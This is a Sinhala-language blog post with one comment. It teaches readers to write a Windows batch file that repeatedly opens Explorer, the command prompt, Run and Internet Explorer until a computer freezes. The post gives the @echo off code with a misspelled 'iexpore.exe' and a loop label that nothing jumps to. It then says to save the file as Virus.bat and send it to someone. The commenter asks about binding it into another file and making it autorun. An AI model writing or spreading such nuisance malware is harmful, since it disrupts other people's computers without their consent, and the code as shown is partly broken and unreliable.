Breaking News:

latest

වයිරස් Spam බෝමිබයක් හදමුද?

අදත් ඔන්න Note pad පිස්සුවක් ගෙනාවා?හැබැයි මෙික නමි කලින් දුන්න එ්වා‍ට වඩා දරැණුයි.මෙකද මෙිකට පුලුවන් Computer එක Stuck කරන්න?මෙන්න මෙීකයි ස...

අදත් ඔන්න Note pad පිස්සුවක් ගෙනාවා?හැබැයි මෙික නමි කලින් දුන්න එ්වා‍ට වඩා දරැණුයි.මෙකද මෙිකට පුලුවන් Computer එක Stuck කරන්න?මෙන්න මෙීකයි සිද්ධිය මෙි Code එක ගහලා හදාගන්න file එක කවුරැ හරි Open කරොත් Internet Explorer,My Document වගේ එ්වා දිගට හරහට Open වෙනව‍ා.කීපාරක් Open වෙනව‍ාද කියන එක Virus එක හදන අපිට පාලනය කරන්න පුලුවන්!හැබැයි පරිගනකයට හානියක් නැහැ,වැඩිම උනොත් කලින් කිවිවා වගේ Stuck වෙයි?

දැන් එහෙනමි මුලින්ම Note pad Open කරගන්න,ඊට පස්සේ මෙ Code එක ගහගන්න,නැත්නමි ඉතින් Copy කරලා Paste කරගන්න?

@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer

මම කලින් කියපු වාර ගාන හදාගන්න ඔිනි මෙහෙමයි.start dir කියලා තියෙන තැන ඉදන් ප‍ටන්ගන්න ට‍ික තමන්ට ඔිනි ගානක් Copy කරලා Paste කරගන්න,ඒ කියන්නේ දෙපාරක් ඔිනි නමි,
@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer
start dir
start command
start iexpore.exe
start run
start explorer

මෙි වගේ ඔිනි තරමක් Paste කරන්න,Paste කරන ග‍ාන වැඩිවෙන කොට Computer එක Stuck වෙන්න බලනවා,

අන්තිමට තමන් කැමති නමකින් Save කරන්න,නමෙි අන්තිමට .bat කියලා තියලා ex : Virus.bat
දැන් Virus එක හදලා ඉවරයි?ක‍‍ාට හරි යවලා බලන්‍නකෝ මොකද වෙන්නේ කියලා?තමන්ටම උත්සහ කරන්න ඔිනි නමි Code එක වැඩිපුර Type නොකර උත්සහ කරලා බලන්න පුලුවන් :D

1 comment

Anonymous said...

elz bn...mekai file bind eki mx karala maru gemak gahath haki....mekatama barida bn auto run ekakuth liyanda????